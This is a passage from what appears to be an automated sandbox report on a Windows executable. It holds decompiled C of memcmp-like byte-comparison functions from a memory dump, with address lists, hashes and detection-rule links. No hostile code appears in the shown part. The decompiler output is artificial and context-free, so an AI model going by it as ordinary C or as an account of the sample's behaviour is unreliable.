								if(_t271 != 0) {
									goto L1;
								}
								goto L31;
							}
							_t63 = (0 | _t304 > 0x00000000) - 1; // -1
							_t271 = (_t304 > 0) + _t63;
							if(_t271 != 0) {
								goto L1;
							}
							goto L29;
						}
						_t57 = (0 | _t302 > 0x00000000) - 1; // -1
						_t271 = (_t302 > 0) + _t57;
						if(_t271 != 0) {
							goto L1;
						}
						goto L27;
					}
					_t309 = (_t192 & 0x000000ff) - ( *(_t187 - 0x19) & 0x000000ff);
					if(_t309 == 0) {
						L16:
						_t311 = ( *(_t183 - 0x18) & 0x000000ff) - ( *(_t187 - 0x18) & 0x000000ff);
						if(_t311 == 0) {
							L18:
							_t313 = ( *(_t183 - 0x17) & 0x000000ff) - ( *(_t187 - 0x17) & 0x000000ff);
							if(_t313 == 0) {
								L20:
								_t271 = ( *(_t183 - 0x16) & 0x000000ff) - ( *(_t187 - 0x16) & 0x000000ff);
								if(_t271 != 0) {
									_t50 = (0 | _t271 > 0x00000000) - 1; // -1
									_t271 = (_t271 > 0) + _t50;
								}
								goto L23;
							}
							_t44 = (0 | _t313 > 0x00000000) - 1; // -1
							_t271 = (_t313 > 0) + _t44;
							if(_t271 != 0) {
								goto L1;
							}
							goto L20;
						}
						_t38 = (0 | _t311 > 0x00000000) - 1; // -1
						_t271 = (_t311 > 0) + _t38;
						if(_t271 != 0) {
							goto L1;
						}
						goto L18;
					}
					_t32 = (0 | _t309 > 0x00000000) - 1; // -1
					_t271 = (_t309 > 0) + _t32;
					if(_t271 != 0) {
						goto L1;
					}
					goto L16;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1d) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
					if(__esi == 0) {
						L5:
						__esi =  *(__eax - 0x1c) & 0x000000ff;
						__edx =  *(__ecx - 0x1c) & 0x000000ff;
						__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
						if(__esi == 0) {
							L7:
							__esi =  *(__eax - 0x1b) & 0x000000ff;
							__edx =  *(__ecx - 0x1b) & 0x000000ff;
							__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
							if(__esi == 0) {
								L9:
								__esi =  *(__eax - 0x1a) & 0x000000ff;
								__edx =  *(__ecx - 0x1a) & 0x000000ff;
								__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
								if(__esi != 0) {
									__edx = 0;
									_t25 = (0 | __esi > 0x00000000) - 1; // -1
									__esi = (__esi > 0) + _t25;
								}
								goto L12;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t19 = __edx - 1; // -1
							__esi = __edx + _t19;
							if(__edx + _t19 != 0) {
								goto L1;
							}
							goto L9;
						}
						__edx = 0;
						__edx = 0 | __esi > 0x00000000;
						_t13 = __edx - 1; // -1
						__esi = __edx + _t13;
						if(__edx + _t13 != 0) {
							goto L1;
						}
						goto L7;
					}
					__edx = 0;
					__edx = 0 | __esi > 0x00000000;
					_t7 = __edx - 1; // -1
					__esi = __edx + _t7;
					if(__edx + _t7 != 0) {
						goto L1;
					}
					goto L5;
				}
				L1:
				_t184 = _t271;
				goto L2;
			}

0x0042abac
0x0042abac
0x0042abb2
0x0042ac29
0x0042ac2b
0x0042ac2d
0x00000000
0x00000000
0x0042ac33
0x0042ac39
0x0042acb0
0x0042acb2
0x0042acb4
0x00000000
0x00000000
0x0042acba
0x0042acc0
0x0042ad37
0x0042ad39
0x0042ad3b
0x00000000
0x00000000
0x0042ad41
0x0042ad47
0x0042adbe
0x0042adc0
0x0042adc2
0x00000000
0x00000000
0x0042adc8
0x0042adce
0x0042ae45
0x0042ae47
0x0042ae49
0x00000000
0x00000000
0x0042ae55
0x0042aecd
0x0042aecf
0x0042aed1
0x00000000
0x00000000
0x0042aed7
0x0042aedd
0x0042af54
0x0042af56
0x0042af58
0x00000000
0x00000000
0x0042af66
0x0042af68
0x0042af75
0x0042af75
0x0042af75
0x0042aba6
0x0042b84a
0x0042b84a
0x0042aee6
0x0042aee8
0x0042aefd
0x0042af05
0x0042af07
0x0042af1c
0x0042af24
0x0042af26
0x0042af3b
0x0042af43
0x0042af45
0x0042af4e
0x0042af4e
0x0042af4e
0x00000000
0x0042af45
0x0042af2f
0x0042af2f
0x0042af35
0x00000000
0x00000000
0x00000000
0x0042af35
0x0042af10
0x0042af10
0x0042af16
0x00000000
0x00000000
0x00000000
0x0042af16
0x0042aef1
0x0042aef1
0x0042aef7
0x00000000
0x00000000
0x00000000
0x0042aef7
0x0042ae5f
0x0042ae61
0x0042ae76
0x0042ae7e
0x0042ae80
0x0042ae95
0x0042ae9d
0x0042ae9f
0x0042aeb4
0x0042aebc
0x0042aebe
0x0042aec7
0x0042aec7
0x0042aec7
0x00000000
0x0042aebe
0x0042aea8
0x0042aea8
0x0042aeae
0x00000000
0x00000000
0x00000000
0x0042aeae
0x0042ae89
0x0042ae89
0x0042ae8f
0x00000000
0x00000000
0x00000000
0x0042ae8f
0x0042ae6a
0x0042ae6a
0x0042ae70
0x00000000
0x00000000
0x00000000
0x0042ae70
0x0042add7
0x0042add9
0x0042adee
0x0042adf6
0x0042adf8
0x0042ae0d
0x0042ae15
0x0042ae17
0x0042ae2c
0x0042ae34
0x0042ae36
0x0042ae3f
0x0042ae3f
0x0042ae3f
0x00000000
0x0042ae36
0x0042ae20
0x0042ae20
0x0042ae26
0x00000000
0x00000000
0x00000000
0x0042ae26
0x0042ae01
0x0042ae01
0x0042ae07
0x00000000
0x00000000
0x00000000
0x0042ae07
0x0042ade2
0x0042ade2
0x0042ade8
0x00000000
0x00000000
0x00000000
0x0042ade8
0x0042ad50
0x0042ad52
0x0042ad67
0x0042ad6f
0x0042ad71
0x0042ad86
0x0042ad8e
0x0042ad90
0x0042ada5
0x0042adad
0x0042adaf
0x0042adb8
0x0042adb8
0x0042adb8
0x00000000
0x0042adaf
0x0042ad99
0x0042ad99
0x0042ad9f
0x00000000
0x00000000
0x00000000
0x0042ad9f
0x0042ad7a
0x0042ad7a
0x0042ad80
0x00000000
0x00000000
0x00000000
0x0042ad80
0x0042ad5b
0x0042ad5b
0x0042ad61
0x00000000
0x00000000
0x00000000
0x0042ad61
0x0042acc9
0x0042accb
0x0042ace0
0x0042ace8
0x0042acea
0x0042acff
0x0042ad07
0x0042ad09
0x0042ad1e
0x0042ad26
0x0042ad28
0x0042ad31
0x0042ad31
0x0042ad31
0x00000000
0x0042ad28
0x0042ad12
0x0042ad12
0x0042ad18
0x00000000
0x00000000
0x00000000
0x0042ad18
0x0042acf3
0x0042acf3
0x0042acf9
0x00000000
0x00000000
0x00000000
0x0042acf9
0x0042acd4
0x0042acd4
0x0042acda
0x00000000
0x00000000
0x00000000
0x0042acda
0x0042ac42
0x0042ac44
0x0042ac59
0x0042ac61
0x0042ac63
0x0042ac78
0x0042ac80
0x0042ac82
0x0042ac97
0x0042ac9f
0x0042aca1
0x0042acaa
0x0042acaa
0x0042acaa
0x00000000
0x0042aca1
0x0042ac8b
0x0042ac8b
0x0042ac91
0x00000000
0x00000000
0x00000000
0x0042ac91
0x0042ac6c
0x0042ac6c
0x0042ac72
0x00000000
0x00000000
0x00000000
0x0042ac72
0x0042ac4d
0x0042ac4d
0x0042ac53
0x00000000
0x00000000
0x00000000
0x0042abb4
0x0042abb4
0x0042abb7
0x0042abbb
0x0042abbd
0x0042abd2
0x0042abd2
0x0042abd6
0x0042abda
0x0042abdc
0x0042abf1
0x0042abf1
0x0042abf5
0x0042abf9
0x0042abfb
0x0042ac10
0x0042ac10
0x0042ac14
0x0042ac18
0x0042ac1a
0x0042ac1c
0x0042ac23
0x0042ac23
0x0042ac23
0x00000000
0x0042ac1a
0x0042abfd
0x0042ac01
0x0042ac04
0x0042ac04
0x0042ac0a
0x00000000
0x00000000
0x00000000
0x0042ac0a
0x0042abde
0x0042abe2
0x0042abe5
0x0042abe5
0x0042abeb
0x00000000
0x00000000
0x00000000
0x0042abeb
0x0042abbf
0x0042abc3
0x0042abc6
0x0042abc6
0x0042abcc
0x00000000
0x00000000
0x00000000
0x0042abcc
0x0042a807
0x0042a807
0x00000000

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
Instruction ID: 3f2818f3ff1c467ec13baeac7fa0219e9af1ed42fa086305ab4b937788dae41f
Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
Instruction Fuzzy Hash: 8DC1C473E0A9F2478776412D641823FEE626F81B4535FC392CCD03F789C22A6D2685E5

Uniqueness

Uniqueness Score: -1.00%

Function 0042A80E Relevance: .3, Instructions: 326
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0042A80E(void* __eax, void* __ecx) {
				void* _t177;
				signed int _t178;
				void* _t181;
				signed char _t186;
				signed char _t187;
				signed char _t188;
				signed char _t190;
				signed char _t191;
				signed int _t197;
				signed int _t263;
				void* _t266;
				void* _t268;
				void* _t270;
				void* _t272;
				void* _t274;
				void* _t276;
				void* _t279;
				void* _t281;
				void* _t283;
				void* _t286;
				void* _t288;
				void* _t290;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t300;
				void* _t302;
				void* _t304;

				_t181 = __ecx;
				_t177 = __eax;
				if( *((intOrPtr*)(__eax - 0x1c)) ==  *((intOrPtr*)(__ecx - 0x1c))) {
					_t263 = 0;
					L11:
					if(_t263 != 0) {
						goto L1;
					}
					_t186 =  *(_t177 - 0x18);
					if(_t186 ==  *(_t181 - 0x18)) {
						_t263 = 0;
						L22:
						if(_t263 != 0) {
							goto L1;
						}
						_t187 =  *(_t177 - 0x14);
						if(_t187 ==  *(_t181 - 0x14)) {
							_t263 = 0;
							L33:
							if(_t263 != 0) {
								goto L1;
							}
							_t188 =  *(_t177 - 0x10);
							if(_t188 ==  *(_t181 - 0x10)) {
								_t263 = 0;
								L44:
								if(_t263 != 0) {
									goto L1;
								}
								if( *(_t177 - 0xc) ==  *(_t181 - 0xc)) {
									_t263 = 0;
									L55:
									if(_t263 != 0) {
										goto L1;
									}
									_t190 =  *(_t177 - 8);
									if(_t190 ==  *(_t181 - 8)) {
										_t263 = 0;
										L66:
										if(_t263 != 0) {
											goto L1;
										}
										_t191 =  *(_t177 - 4);
										if(_t191 ==  *(_t181 - 4)) {
											_t178 = 0;
											L78:
											if(_t178 == 0) {
												_t178 = 0;
											}
											L80:
											return _t178;
										}
										_t266 = (_t191 & 0x000000ff) - ( *(_t181 - 4) & 0x000000ff);
										if(_t266 == 0) {
											L70:
											_t268 = ( *(_t177 - 3) & 0x000000ff) - ( *(_t181 - 3) & 0x000000ff);
											if(_t268 == 0) {
												L72:
												_t270 = ( *(_t177 - 2) & 0x000000ff) - ( *(_t181 - 2) & 0x000000ff);
												if(_t270 == 0) {
													L75:
													_t178 = ( *(_t177 - 1) & 0x000000ff) - ( *(_t181 - 1) & 0x000000ff);
													if(_t178 != 0) {
														_t176 = (0 | _t178 > 0x00000000) - 1; // -1
														_t178 = (_t178 > 0) + _t176;
													}
													goto L78;
												}
												_t197 = (0 | _t270 > 0x00000000) + (0 | _t270 > 0x00000000) - 1;
												if(_t197 == 0) {
													goto L75;
												}
												L74:
												_t178 = _t197;
												goto L78;
											}
											_t197 = (0 | _t268 > 0x00000000) + (0 | _t268 > 0x00000000) - 1;
											if(_t197 != 0) {
												goto L74;
											}
											goto L72;
										}
										_t197 = (0 | _t266 > 0x00000000) + (0 | _t266 > 0x00000000) - 1;
										if(_t197 != 0) {
											goto L74;
										}
										goto L70;
									}
									_t272 = (_t190 & 0x000000ff) - ( *(_t181 - 8) & 0x000000ff);
									if(_t272 == 0) {
										L59:
										_t274 = ( *(_t177 - 7) & 0x000000ff) - ( *(_t181 - 7) & 0x000000ff);
										if(_t274 == 0) {
											L61:
											_t276 = ( *(_t177 - 6) & 0x000000ff) - ( *(_t181 - 6) & 0x000000ff);
											if(_t276 == 0) {
												L63:
												_t263 = ( *(_t177 - 5) & 0x000000ff) - ( *(_t181 - 5) & 0x000000ff);
												if(_t263 != 0) {
													_t151 = (0 | _t263 > 0x00000000) - 1; // -1
													_t263 = (_t263 > 0) + _t151;
												}
												goto L66;
											}
											_t145 = (0 | _t276 > 0x00000000) - 1; // -1
											_t263 = (_t276 > 0) + _t145;
											if(_t263 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t139 = (0 | _t274 > 0x00000000) - 1; // -1
										_t263 = (_t274 > 0) + _t139;
										if(_t263 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t133 = (0 | _t272 > 0x00000000) - 1; // -1
									_t263 = (_t272 > 0) + _t133;
									if(_t263 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t279 = ( *(_t177 - 0xc) & 0x000000ff) - ( *(_t181 - 0xc) & 0x000000ff);
								if(_t279 == 0) {
									L48:
									_t281 = ( *(_t177 - 0xb) & 0x000000ff) - ( *(_t181 - 0xb) & 0x000000ff);
									if(_t281 == 0) {
										L50:
										_t283 = ( *(_t177 - 0xa) & 0x000000ff) - ( *(_t181 - 0xa) & 0x000000ff);
										if(_t283 == 0) {
											L52:
											_t263 = ( *(_t177 - 9) & 0x000000ff) - ( *(_t181 - 9) & 0x000000ff);
											if(_t263 != 0) {
												_t126 = (0 | _t263 > 0x00000000) - 1; // -1
												_t263 = (_t263 > 0) + _t126;
											}
											goto L55;
										}
										_t120 = (0 | _t283 > 0x00000000) - 1; // -1
										_t263 = (_t283 > 0) + _t120;
										if(_t263 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t114 = (0 | _t281 > 0x00000000) - 1; // -1
									_t263 = (_t281 > 0) + _t114;
									if(_t263 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t108 = (0 | _t279 > 0x00000000) - 1; // -1
								_t263 = (_t279 > 0) + _t108;
								if(_t263 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t286 = (_t188 & 0x000000ff) - ( *(_t181 - 0x10) & 0x000000ff);
							if(_t286 == 0) {
								L37:
								_t288 = ( *(_t177 - 0xf) & 0x000000ff) - ( *(_t181 - 0xf) & 0x000000ff);
								if(_t288 == 0) {
									L39:
									_t290 = ( *(_t177 - 0xe) & 0x000000ff) - ( *(_t181 - 0xe) & 0x000000ff);
									if(_t290 == 0) {
										L41:
										_t263 = ( *(_t177 - 0xd) & 0x000000ff) - ( *(_t181 - 0xd) & 0x000000ff);
										if(_t263 != 0) {
											_t100 = (0 | _t263 > 0x00000000) - 1; // -1
											_t263 = (_t263 > 0) + _t100;
										}
										goto L44;
									}
									_t94 = (0 | _t290 > 0x00000000) - 1; // -1
									_t263 = (_t290 > 0) + _t94;
									if(_t263 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t88 = (0 | _t288 > 0x00000000) - 1; // -1
								_t263 = (_t288 > 0) + _t88;
								if(_t263 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t82 = (0 | _t286 > 0x00000000) - 1; // -1
							_t263 = (_t286 > 0) + _t82;
							if(_t263 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t293 = (_t187 & 0x000000ff) - ( *(_t181 - 0x14) & 0x000000ff);
						if(_t293 == 0) {
							L26:
							_t295 = ( *(_t177 - 0x13) & 0x000000ff) - ( *(_t181 - 0x13) & 0x000000ff);
							if(_t295 == 0) {
								L28:
								_t297 = ( *(_t177 - 0x12) & 0x000000ff) - ( *(_t181 - 0x12) & 0x000000ff);
								if(_t297 == 0) {
									L30:
									_t263 = ( *(_t177 - 0x11) & 0x000000ff) - ( *(_t181 - 0x11) & 0x000000ff);
									if(_t263 != 0) {
										_t75 = (0 | _t263 > 0x00000000) - 1; // -1
										_t263 = (_t263 > 0) + _t75;
									}
									goto L33;
								}
								_t69 = (0 | _t297 > 0x00000000) - 1; // -1
								_t263 = (_t297 > 0) + _t69;
								if(_t263 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t63 = (0 | _t295 > 0x00000000) - 1; // -1
							_t263 = (_t295 > 0) + _t63;
							if(_t263 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t57 = (0 | _t293 > 0x00000000) - 1; // -1
						_t263 = (_t293 > 0) + _t57;
						if(_t263 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t300 = (_t186 & 0x000000ff) - ( *(_t181 - 0x18) & 0x000000ff);
					if(_t300 == 0) {
						L15:
						_t302 = ( *(_t177 - 0x17) & 0x000000ff) - ( *(_t181 - 0x17) & 0x000000ff);
						if(_t302 == 0) {
							L17:
							_t304 = ( *(_t177 - 0x16) & 0x000000ff) - ( *(_t181 - 0x16) & 0x000000ff);
							if(_t304 == 0) {
								L19:
								_t263 = ( *(_t177 - 0x15) & 0x000000ff) - ( *(_t181 - 0x15) & 0x000000ff);
								if(_t263 != 0) {
									_t50 = (0 | _t263 > 0x00000000) - 1; // -1
									_t263 = (_t263 > 0) + _t50;
								}
								goto L22;
							}
							_t44 = (0 | _t304 > 0x00000000) - 1; // -1
							_t263 = (_t304 > 0) + _t44;
							if(_t263 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t38 = (0 | _t302 > 0x00000000) - 1; // -1
						_t263 = (_t302 > 0) + _t38;
						if(_t263 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t32 = (0 | _t300 > 0x00000000) - 1; // -1
					_t263 = (_t300 > 0) + _t32;
					if(_t263 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1c) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
					if(__esi == 0) {
						L4:
						__esi =  *(__eax - 0x1b) & 0x000000ff;
						__edx =  *(__ecx - 0x1b) & 0x000000ff;
						__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
						if(__esi == 0) {
							L6:
							__esi =  *(__eax - 0x1a) & 0x000000ff;
							__edx =  *(__ecx - 0x1a) & 0x000000ff;
							__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
							if(__esi == 0) {
								L8:
								__esi =  *(__eax - 0x19) & 0x000000ff;
								__edx =  *(__ecx - 0x19) & 0x000000ff;
								__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
								if(__esi != 0) {
									__edx = 0;
									_t25 = (0 | __esi > 0x00000000) - 1; // -1
									__esi = (__esi > 0) + _t25;
								}
								goto L11;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t19 = __edx - 1; // -1
							__esi = __edx + _t19;
							if(__edx + _t19 != 0) {
								goto L1;
							}
							goto L8;
						}
						__edx = 0;
						__edx = 0 | __esi > 0x00000000;
						_t13 = __edx - 1; // -1
						__esi = __edx + _t13;
						if(__edx + _t13 != 0) {
							goto L1;
						}
						goto L6;
					}
					__edx = 0;
					__edx = 0 | __esi > 0x00000000;
					_t7 = __edx - 1; // -1
					__esi = __edx + _t7;
					if(__edx + _t7 != 0) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t178 = _t263;
				goto L80;
			}

0x0042a80e
0x0042a80e
0x0042a814
0x0042a87f
0x0042a881
0x0042a883
0x00000000
0x00000000
0x0042a885
0x0042a88b
0x0042a902
0x0042a904
0x0042a906
0x00000000
0x00000000
0x0042a90c
0x0042a912
0x0042a989
0x0042a98b
0x0042a98d
0x00000000
0x00000000
0x0042a993
0x0042a999
0x0042aa10
0x0042aa12
0x0042aa14
0x00000000
0x00000000
0x0042aa20
0x0042aa98
0x0042aa9a
0x0042aa9c
0x00000000
0x00000000
0x0042aaa2
0x0042aaa8
0x0042ab1f
0x0042ab21
0x0042ab23
0x00000000
0x00000000
0x0042ab29
0x0042ab2f
0x0042ab9e
0x0042aba0
0x0042aba2
0x0042aba4
0x0042aba4
0x0042aba6
0x0042b84a
0x0042b84a
0x0042ab38
0x0042ab3a
0x0042ab4b
0x0042ab53
0x0042ab55
0x0042ab66
0x0042ab6e
0x0042ab70
0x0042ab85
0x0042ab8d
0x0042ab8f
0x0042ab98
0x0042ab98
0x0042ab98
0x00000000
0x0042ab8f
0x0042ab79
0x0042ab7f
0x00000000
0x00000000
0x0042ab81
0x0042ab81
0x00000000
0x0042ab81
0x0042ab5e
0x0042ab64
0x00000000
0x00000000
0x00000000
0x0042ab64
0x0042ab43
0x0042ab49
0x00000000
0x00000000
0x00000000
0x0042ab49
0x0042aab1
0x0042aab3
0x0042aac8
0x0042aad0
0x0042aad2
0x0042aae7
0x0042aaef
0x0042aaf1
0x0042ab06
0x0042ab0e
0x0042ab10
0x0042ab19
0x0042ab19
0x0042ab19
0x00000000
0x0042ab10
0x0042aafa
0x0042aafa
0x0042ab00
0x00000000
0x00000000
0x00000000
0x0042ab00
0x0042aadb
0x0042aadb
0x0042aae1
0x00000000
0x00000000
0x00000000
0x0042aae1
0x0042aabc
0x0042aabc
0x0042aac2
0x00000000
0x00000000
0x00000000
0x0042aac2
0x0042aa2a
0x0042aa2c
0x0042aa41
0x0042aa49
0x0042aa4b
0x0042aa60
0x0042aa68
0x0042aa6a
0x0042aa7f
0x0042aa87
0x0042aa89
0x0042aa92
0x0042aa92
0x0042aa92
0x00000000
0x0042aa89
0x0042aa73
0x0042aa73
0x0042aa79
0x00000000
0x00000000
0x00000000
0x0042aa79
0x0042aa54
0x0042aa54
0x0042aa5a
0x00000000
0x00000000
0x00000000
0x0042aa5a
0x0042aa35
0x0042aa35
0x0042aa3b
0x00000000
0x00000000
0x00000000
0x0042aa3b
0x0042a9a2
0x0042a9a4
0x0042a9b9
0x0042a9c1
0x0042a9c3
0x0042a9d8
0x0042a9e0
0x0042a9e2
0x0042a9f7
0x0042a9ff
0x0042aa01
0x0042aa0a
0x0042aa0a
0x0042aa0a
0x00000000
0x0042aa01
0x0042a9eb
0x0042a9eb
0x0042a9f1
0x00000000
0x00000000
0x00000000
0x0042a9f1
0x0042a9cc
0x0042a9cc
0x0042a9d2
0x00000000
0x00000000
0x00000000
0x0042a9d2
0x0042a9ad
0x0042a9ad
0x0042a9b3
0x00000000
0x00000000
0x00000000
0x0042a9b3
0x0042a91b
0x0042a91d
0x0042a932
0x0042a93a
0x0042a93c
0x0042a951
0x0042a959
0x0042a95b
0x0042a970
0x0042a978
0x0042a97a
0x0042a983
0x0042a983
0x0042a983
0x00000000
0x0042a97a
0x0042a964
0x0042a964
0x0042a96a
0x00000000
0x00000000
0x00000000
0x0042a96a
0x0042a945
0x0042a945
0x0042a94b
0x00000000
0x00000000
0x00000000
0x0042a94b
0x0042a926
0x0042a926
0x0042a92c
0x00000000
0x00000000
0x00000000
0x0042a92c
0x0042a894
0x0042a896
0x0042a8ab
0x0042a8b3
0x0042a8b5
0x0042a8ca
0x0042a8d2
0x0042a8d4
0x0042a8e9
0x0042a8f1
0x0042a8f3
0x0042a8fc
0x0042a8fc
0x0042a8fc
0x00000000
0x0042a8f3
0x0042a8dd
0x0042a8dd
0x0042a8e3
0x00000000
0x00000000
0x00000000
0x0042a8e3
0x0042a8be
0x0042a8be
0x0042a8c4
0x00000000
0x00000000
0x00000000
0x0042a8c4
0x0042a89f
0x0042a89f
0x0042a8a5
0x00000000
0x00000000
0x00000000
0x0042a816
0x0042a816
0x0042a819
0x0042a81d
0x0042a81f
0x0042a830
0x0042a830
0x0042a834
0x0042a838
0x0042a83a
0x0042a84b
0x0042a84b
0x0042a84f
0x0042a853
0x0042a855
0x0042a866
0x0042a866
0x0042a86a
0x0042a86e
0x0042a870
0x0042a872
0x0042a879
0x0042a879
0x0042a879
0x00000000
0x0042a870
0x0042a857
0x0042a85b
0x0042a85e
0x0042a85e
0x0042a864
0x00000000
0x00000000
0x00000000
0x0042a864
0x0042a83c
0x0042a840
0x0042a843
0x0042a843
0x0042a849
0x00000000
0x00000000
0x00000000
0x0042a849
0x0042a821
0x0042a825
0x0042a828
0x0042a828
0x0042a82e
0x00000000
0x00000000
0x00000000
0x0042a82e
0x0042a807
0x0042a807
0x00000000

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
Instruction ID: ae6b3db1bb8134c33823d4274de45a53aa02b575fbde7305174ad7e9aadbbec7
Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
Instruction Fuzzy Hash: 79B1A473E0A8F24B8775412E641823BEE626F91B4435FC392CCD03F289C22A6D26D5D5

Uniqueness

Uniqueness Score: -1.00%

Function 00426810 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13a3fb3ebbed7dbd2a4ecb847c0b0a63a723d973e3b7f4e5aa31ded2eb3dabe8
Instruction ID: 53911a031e8d044e0c54d17b208f5382e2e30df8cdea541e7d1b5a6a957e7295
Opcode Fuzzy Hash: 13a3fb3ebbed7dbd2a4ecb847c0b0a63a723d973e3b7f4e5aa31ded2eb3dabe8
Instruction Fuzzy Hash: 7E218C33AB94BB01DB808B71DC0463237D2DFCB206FAF81B5DA4887642D63DE4029225

Uniqueness

Uniqueness Score: -1.00%

Function 00405C40 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36694f3492540d659295c2d4c52c901faa507fdae4b030759ec27eb32c5afefa
Instruction ID: c9576c34c1b5228737ead9b92e59565c071d7a6608ae3e9cad9f52a3c89a634f
Opcode Fuzzy Hash: 36694f3492540d659295c2d4c52c901faa507fdae4b030759ec27eb32c5afefa
Instruction Fuzzy Hash: 702181375788BB02EB408F719C1463A37D3DBCB206FAF81B5D64887642E23DD4029664

Uniqueness

Uniqueness Score: -1.00%

Function 0042CDD0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 7f4e842d565253e168bd4b3af5596d05f16190f49666fdd209ea36c5b77a7fda
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 051138B73400A243D614863DF8F46BFA395EBC63207AF427BD1424B758D52AE9559508

Uniqueness

Uniqueness Score: -1.00%

Function 00426838 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fd0ca6cf2b991ab352064641c9626f019ba322c509b6f282379a3ea19a7d3c8
Instruction ID: 9bb401654e0123457c85568d58b999108ddaf201ebada3f049e8c34e9d91eaaa
Opcode Fuzzy Hash: 8fd0ca6cf2b991ab352064641c9626f019ba322c509b6f282379a3ea19a7d3c8
Instruction Fuzzy Hash: 1E215173AB94F705DB918B719C0463227D3DFC720AF6F81B5CA8887542D63ED0039126

Uniqueness

Uniqueness Score: -1.00%

Function 00405C68 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c347b1fdb9411f0377ae06d25071878c0b98999e07dbfde932e6c7133de201cd
